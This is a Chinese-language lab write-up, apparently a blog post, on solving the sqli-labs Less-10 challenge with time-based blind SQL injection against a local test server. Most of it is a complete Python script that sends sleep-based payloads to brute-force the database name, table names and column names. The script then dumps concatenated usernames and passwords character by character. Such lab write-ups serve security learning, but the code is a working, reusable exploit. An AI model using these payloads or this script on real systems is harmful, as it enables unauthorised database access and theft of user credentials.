先判断闭合方式,确定为双引号闭合,这个可以跑字典。
进行时间盲注
判断可知数据库的名字长度为8
判断数据库名字
可以知道第一位是s
使用burpsuit进行爆破,发现返回值是一样的,没有进行过多的尝试了,尝试使用脚本吧,总比手工要快。
使用脚本来爆破
定义了几个函数,分别是数据库长度,数据库的名字,爆出表名字,爆出列名字,选择字段进行攻击。这几个功能,大同小异,无非就是改改变量的位置和字典的多少,容易上手。
首先是数据库长度:
数据库的名称:
表名字:
Users表的列名字:
数据名,这里爆的是username和password的数据
这里只爆破了一百位,数据太多了,设置延时三秒实在是太慢了。
最后附上代码:
# coding:utf-8
import requests
import datetime
import time
# 获取数据库名长度
def database_len():
for i in range(1, 10):
url = "http://127.0.0.1/sqli-labs-master/Less-10/"
payload = "?id=1\" and if(length(database())>%d,0,sleep(3)) -- a" % i
print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec < 1:
print(i)
else:
print(i)
break
print('database_len:', i)
def database_name():
name = ''
for j in range(1,9):
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
url = "http://127.0.0.1/sqli-labs-master/Less-10/"
payload = "?id=1\" and if(substr(database(),%d,1)='%s',sleep(3),1) -- a" % (j, i)
print(url+payload)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >=2:
name += i
print(name)
break
print('database_name:', name)
def table_name():
name = ''
for z in range(0,9):
for i in range(1,9):
for j in '0123456789abcdefghijklmnopqrstuvwxyz':
# http://127.0.0.1/sql1/Less-9/?id=1' and if(substr((select table_name from information_schema.tables
# where table_schema='security' limit 0,1),1,1)='s',1,sleep(5))--+
url = "http://127.0.0.1/sqli-labs-master/Less-10/"
payload = "?id=1\" and if(substr((select table_name from information_schema.tables " \
"where table_schema=database() limit %d,1),%d,1)='%s',sleep(3),1) -- a" % (z,i,j)
# print(url+payload)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >=2:
name += j
print(name)
break
print('database_name:', name)
name += ','
# print('database_name:', name)
def column_name():
name = ''
for z in range(0,15):
for i in range(1,12):
for j in '0123456789abcdefghijklmnopqrstuvwxyz':
# http://127.0.0.1/sql1/Less-9/?id=1' and if(substr((select column_name from information_schema.columns
# where table_name='users' limit 0,1),1,1)='s',1,sleep(5))--+
url = "http://127.0.0.1/sqli-labs-master/Less-10/"
payload = "?id=1\" and if(substr((select column_name from information_schema.columns " \
"where table_name='users' limit %d,1),%d,1)='%s',sleep(3),1) -- a" % (z,i,j)
# print(url+payload)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >=2:
name += j
print(name)
break
print('column_name:', name)
name += ','
def list_data():
name = ''
# for z in range(0, 15):
for i in range(1, 100):
for j in '0123456789abcdefghijklmnopqrstuvwxyz#,@-+=)(*&*/.!+':
# http://127.0.0.1/sql1/Less-9/?id=1' and
# if(substr((select username from security.users limit 0,1),1,1)='s',1,sleep(5))--+
url = "http://127.0.0.1/sqli-labs-master/Less-10/"
payload = "?id=1\" and if(substr((select group_concat(username,'-',password) from users " \
"),%d,1)='%s',sleep(3),1) -- a" % (i, j)
# print(url+payload)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 2:
name += j
print(name)
break
print('column_name:', name)
name += ','
if __name__ == '__main__':
database_name()
# database_len()
# table_name()
# column_name()
# list_data()
扫一扫
810
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
